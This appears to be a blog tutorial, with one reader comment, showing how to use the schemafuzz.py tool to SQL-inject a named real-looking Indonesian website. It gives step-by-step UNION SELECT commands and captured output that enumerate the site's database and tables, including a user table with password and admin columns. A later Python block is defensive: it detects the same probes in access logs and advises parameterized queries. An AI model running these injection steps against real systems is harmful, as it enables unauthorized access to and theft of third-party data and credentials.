Using schemafuzz.py
1. Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2. Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3. CMD

In CMD, change to the folder where schemafuzz.py is located... Start each command with the format:

    schemafuzz.py -u "target url" --command

The list of commands is below...

1. Find a target

Example: http://www.ditplb.or.id/profile.php?id=1

2. Enter the command to find the columns

Example:

    schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol

The output is:

    [+] URL: http://www.ditplb.or.id/profile.php?id=1--
    [+] Evasion Used: "+" "--"
    [+] 20:36:29
    [-] Proxy Not Given
    [+] Attempting To find the number of columns...
    [+] Testing: 0,1,2,
    [+] Column Length is: 3
    [+] Found null column at column #: 2
    [+] SQLi URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--
    [+] darkc0de URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
    [-] Done!

So we use http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de for the injection.

3. Find the database with the --dbs command

Example:

    schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dbs

The output is:

    [+] URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
    [+] Evasion Used: "+" "--"
    [+] 20:39:32
    [-] Proxy Not Given
    [+] Gathering MySQL Server Configuration...
    Database: t15618_plb
    User: t15618_pl...@localhost
    Version: 5.0.32-Debian_7etch8
    [+] Showing all databases current user has access too!
    [+] Number of Databases: 1
    [0] t15618_plb
    [-] 20:39:39
    [-] Total URL Requests 3
    [-] Done

You can see the database name, right? t15618_plb

4. Find the table names in the database

Example:

    schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D databasename

Which becomes:

    schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D t15618_plb

The output is:

    [+] URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
    [+] Evasion Used: "+" "--"
    [+] 20:43:10
    [-] Proxy Not Given
    [+] Gathering MySQL Server Configuration...
    Database: t15618_plb
    User: t15618_pl...@localhost
    Version: 5.0.32-Debian_7etch8
    [+] Showing Tables & Columns from database "t15618_plb"
    [+] Number of Tables: 11
    [Database]: t15618_plb
    [Table: Columns]
    [0]bukutamu: id,pengirim,email,pesan
    [1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
    [2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
    [3]frm_kategori: id_kat,kategori
    [4]kabupaten: ID_kab,ID_prop,Kabupaten
    [5]pelatihan: ID,Pelatihan
    [6]profile: ID_Profile,sinopsis,Profile
    [7]propinsi: ID_prop,Propinsi
    [8]sd: ID_sd,ID_1,SD,Detail
    [9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
    [10]user: ID_user,UserID,Password,Keterangan,Admin
    [-] 20:43:39
    [-] Total URL Requests 43
    [-] Done
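The request shapes visible in the output above (the `AND 1=2 UNION SELECT 0,1,2--` column probe and the `darkc0de` placeholder token) are easy to spot in a web server access log. The following is an added example, not part of the original post or of schemafuzz itself: the log lines are constructed, the IP addresses are documentation ranges, and it assumes each tested column count arrives as a separate request.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; IPs are documentation addresses, not real clients.
SAMPLE_LOG = """\
203.0.113.9 - - [01/Jan/2010:20:36:01 +0700] "GET /profile.php?id=1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2010:20:36:29 +0700] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0-- HTTP/1.1" 200 310
198.51.100.7 - - [01/Jan/2010:20:36:29 +0700] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0,1-- HTTP/1.1" 200 310
198.51.100.7 - - [01/Jan/2010:20:36:30 +0700] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2-- HTTP/1.1" 200 4890
198.51.100.7 - - [01/Jan/2010:20:39:32 +0700] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de-- HTTP/1.1" 200 4890
203.0.113.9 - - [01/Jan/2010:20:40:00 +0700] "GET /news.php?title=student+union+select+committee HTTP/1.1" 200 2048
"""

LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A numeric first column keeps ordinary text such as "union select committee" from matching.
UNION = re.compile(r"union\s+select\s+(\d+(?:\s*,\s*\w+)*)", re.I)
FALSE_COND = re.compile(r"\band\s+1\s*=\s*2\b", re.I)
MARKER = "darkc0de"  # placeholder token shown in the tool output on this page

def scan(log_text):
    """Return {client_ip: summary} for clients that sent UNION SELECT probes."""
    seen = defaultdict(lambda: {"hits": 0, "col_counts": [], "marker": False, "false_cond": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = unquote_plus(target.partition("?")[2])  # '+' and %xx become plain text
        u = UNION.search(query)
        if not u:
            continue
        s = seen[ip]
        s["hits"] += 1
        s["col_counts"].append(len(u.group(1).split(",")))
        s["marker"] |= MARKER in query.lower()
        s["false_cond"] += bool(FALSE_COND.search(query))
    return dict(seen)

def is_column_enumeration(summary, min_steps=3):
    """True when one client tried min_steps or more consecutive column counts."""
    counts = sorted(set(summary["col_counts"]))
    return len(counts) >= min_steps and counts == list(range(counts[0], counts[0] + len(counts)))

if __name__ == "__main__":
    for ip, s in scan(SAMPLE_LOG).items():
        print(ip, s, "column enumeration:", is_column_enumeration(s))
```

A hit from this scan means the `id` parameter is reaching the SQL statement unescaped; the durable fix is to bind it as a parameter in a prepared statement in profile.php rather than to filter on these strings.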
1 comment:
Great stuff, bro, but http://darkc0de.com/others/schemafuzz.py isn't active anymore, bro??? I want to download it, bro, help me
djudul@yahoo.com